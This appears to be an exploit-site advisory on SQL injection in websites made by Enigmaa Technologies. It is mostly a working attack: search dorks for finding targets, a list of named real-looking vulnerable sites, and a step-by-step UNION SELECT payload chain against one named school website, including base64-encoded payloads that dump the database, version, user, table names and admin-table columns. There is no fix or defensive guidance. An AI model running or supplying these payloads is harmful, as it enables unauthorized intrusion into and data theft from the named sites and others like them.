Engineered by Enigmaa Technologies group BASE64 Sql injection Vulnerability

2019.04.08

Dj3Bb4rAn0n_Dz (NL)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: Engineered by : Enigmaa Tech Group | Powered by Enigmaa Technologies | Designed by Sphinx Technology

===================================================================================================
#  Ttitle : Engineered by Enigmaa Technologies group BASE64 Sql injection Vulnerability
#  Author : Dj3Bb4rAn0n (bassem)                 FB/djebbar.bassem.16
#  Date : /05/04/2019/
#  Home : Annaba ( algeria )
#  Tested on : Linux ( backbox )
#  Vendor : Enigmaa Technologies group
#  Dorks :  Engineered by : Enigmaa Tech Group | Powered by Enigmaa Technologies | Designed by Sphinx Technology
===================================================================================================


PoC   :  

 Admin panel path :         site.com/admin/login/ 
 -----------------------

  [  + ]  Search in google using dorks above 

  [ + ]   Payload  [ ' ]

  [ + ]   Choose your target and look for injection point  [ Encoded with base64 ] Ex:   www.bhbcollege.ac.in/fac.php?id=MTU=            <======  Inject here
  

#######################
 Example of vulnerable sites : 
 ######################

[ + ]  www.bhbcollege.ac.in/fac.php?id=MTU=

[ + ]  www.bookmypuja.in/book.php?id=MzU=

[ + ]  iconacademy.org/view.php?id=25

[ + ] www.krdcollege.in/view.php?id=23

[ + ] hdiedupublishers.com/product.php?id=63 

############
Demo 
############

#  www.navjyotiroyalheritageschool.in/read.php?id=NTA=

#  www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50']

#  www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50']

#  www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50' -- -]         Fixable  : ' -- -

Columns number is 12 : 
-----------------------------
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50' order by 12 -- -]

Vulnerable columns is : 3 | 4 | 6 | 11 | 12 | 
-----------------------------------------------------
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=-50'  Union Select 1,2,3,4,5,6,7,8,9,10,11,12 -- -]

Database | Version | user | Hostamne  : 
------------------------------------------------
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=-50'  Union Select 1,2,concat(database(),0x3c62723e,@@version,0x3c62723e,user(),0x3c62723e,@@Hostname),4,5,6,7,8,9,10,11,12 -- -]

Tables :    [ Encoded with base64]
----------
# www.navjyotiroyalheritageschool.in/read.php?id=LTUwJyAgVW5pb24gU2VsZWN0IDEsMixncm91cF9jb25jYXQoMHgzYzYyNzIzZSx0YWJsZV9uYW1lKSw0LDUsNiw3LDgsOSwxMCwxMSwxMiBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSJta2NvbGN4Zl9uYXYiICAtLSAt

columns :   [ Encoded with base64]
------------
# http://www.navjyotiroyalheritageschool.in /read.php?id=LTUwJyAgVW5pb24gU2VsZWN0IDEsMixncm91cF9jb25jYXQoMHgzYzYyNzIzZSxjb2x1bW5fbmFtZSksNCw1LDYsNyw4LDksMTAsMTEsMTIgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSJhZG1pbiIgIC0tIC0=


########
Greetz to    :  Lakarha_23 | mohammed pazzo | Ja gar 
#######

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Engineered by Enigmaa Technologies group BASE64 Sql injection Vulnerability

Dork: Engineered by : Enigmaa Tech Group | Powered by Enigmaa Technologies | Designed by Sphinx Technology

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.